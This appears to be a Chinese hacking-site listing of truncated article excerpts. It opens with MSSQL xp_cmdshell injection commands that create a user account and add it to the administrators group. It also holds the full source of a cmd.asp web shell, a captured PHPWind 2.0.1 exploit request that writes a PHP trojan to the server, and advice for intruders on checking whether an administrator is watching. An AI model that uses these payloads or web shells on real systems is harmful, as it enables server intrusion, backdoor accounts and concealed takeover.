;exec master..xp_cmdshell "net user name password /add"–
;exec master..xp_cmdshell "net localgroup administrators name /add"–
程序代码开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK
恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select 阅读全文 »
Tags: MSSQL,
SQL Server
作者: nvymask 来源:www.landun.org
前几天正准备加入蓝盾,所以在他们的BBS上面贴了贴子,没想到天浪竟然同意了。既然同意了,就算是蓝盾的人了。为了我们自已网站的安全性,所以决定对网站进行一次安全性检测。
首先,我知道这肯定是租用的虚拟主机。从主机本身的漏洞而言,相信他们公司自已的人应该做得很好。所以我没有选择对主机入手,而是着手于WEB CGI程序。我先看了看BBS,是动网的BBS。现在版本已经比较高了,可以说程序本身没什么漏洞,看看数据库,也已经改了名了http://www.landun.org/bbs/data/ ,返回的响应码是403,数据库的文件夹名没有改(在这里,返回的响应码403的意思是拒绝访问,一般对目录的访问都是拒绝的,如果是404的话就是文件夹或文件不存在)。不过我在WAWA的论坛上看到他说可以直接改任意用户的密码。但本人对ASP不是太 阅读全文 »
作者: 风泽[E.S.T] 来源:http://evilhsu.neeao.com/
你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?HOHO~~很多人都为这个头疼吧,相信你被锁定一次就知道他的操作原理了:
修改[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]下的DisableRegistryTools值为1
解锁的方法也有几种,比如程序用API函数调用注册表直接删除,做一个REG文件直接导入,写一个脚本…………
今天我就教大家写个程序来实现另类锁定,哈哈~~是不是很好奇了?跟我来。
实验环境:windows2000
实验目的:锁定注册表(本方法利用了Cracker的思路来实现,直接让程序修改程序指令,使调用注册表程序禁止。)
实现方法:C程序
首先我们要按照Crac 阅读全文 »
Tags: 注册表
来源:江苏大学信息安全协会
由于在数据加密中存在错误,此会话将结束。请尝试重新连接到远程计算机。
原因: 数据加密为在网络连接上进行数据传输提供了安全性。数据加密错误可能出于安全原因结束会话。
解决方案: 尝试重新连接到远程计算机。加密策略可能在系统和域之间变化。如果仍旧看到该错误信息,请与服务器管理员联系。
远程连接已超时。请尝试重新连接到远程计算机。
原因: 因为您没有在响应的时间限定设置范围内发出响应,所以终端服务器将中断会话。
解决方案: 尝试重新连接到终端服务器。如果收到此错误信息,请在稍后尝试重新连接。如果仍旧收到此错误信息,请与服务器管理员联系。
原因: 由于网络通信量过大引起的网络连接过慢,引起对终端服务器的响应延迟。
解决方案: 尝试重新连接到终端服务器。如果收到此错误信息,请在稍后尝试重新连接。如果仍旧收到此错误信息,请与服务器管理员联系。
阅读全文 »
Tags: 终端
来源:http://home.86hy.com/
这里的asp后门不指像那些一句话木马、砍客、冰狐之类的b/s型的,只指像cmd.asp或2005a.asp的。
第一个,来看zzzeva免fso的cmd.asp
代码如下:<form method="post">
<input type=text name="cmd" size=60>
<input type=submit value="run"></form>
<textarea readonly cols=80 rows=20>
<%response.write server.createobject("wscript.shell").exec("cmd.exe /c
"&request.form("cmd")).stdout.readall%>
</textarea>
是不是觉得有点长了?在注入时写有点不好写。那来改一下。
阅读全文 »
Tags: 一句话马
来源:华西黑客联盟
随着网络黑客工具的简单化和傻瓜化,越来越多的网络爱好者可以通过现成的攻击工具轻松的入侵主机,然而谁也不想在管理员的眼皮底下做入侵,所以在入侵成功以后,一个很重要的事情是:你能不能确认你的行为在别人的监视之下?所以我们首先要知道管理员是不是现在正在你入侵的主机上?
如何判定管理员在线,我们要知道的是管理员是通过什么方式管理主机的:是pcanywhere、vnc、DameWar、终端服务、ipc、telnet还是本地登陆···
一、对于用第三方的控屏工具(pcanywhere、vnc、DameWar等),你只要看相应端口有没有状态为"ESTABLISHED"的连接。一个netstat -an就可以知道,如果想查看与端口相关的进程,使用Fport.exe就可以了。比如我们在一台主机上使用netstat -an发现如下的信息:
Active Connections
阅读全文 »
作者:allyesno 来源:http://blog.csdn.net/freexploit/
猫猫传给我一个phpwind2.0.1漏洞利用程序,可以直接在目录中写入一个木马。怎么说呢,这个漏洞是pinkeyes发现的,本文旨在分析这个漏洞的思路。直到发现这个漏洞是怎么产生的,我还在冒虚汗中,同时pinkeyes 的睿智深深的打动了我,原来我才明白什么才是真正的技术含量。且听我慢慢道来:
在程序运行时,我抓了一个包:
GET /phpwind/job.php?previewjob=preview&D_name=./attachment/set.php&tidwt=<?fputs(fopen
(chr(46).chr(47).chr(101).chr(114).chr(114).chr(111).chr(114).chr(46).chr(112).chr(104).chr(112),w),
阅读全文 »
Tags: PHPWind
把c:winnt目录中的desktop.ini 和folder.htt(注意:每种不同目录下的desktop.ini和folder.htt文件都是不同的,所以一定要是winnt目录下的。)复制出来,用记事本打开folder.htt文件把下面的代码加在最前面:
阅读全文 »
Tags: DESKTOP.INI,
folder.htt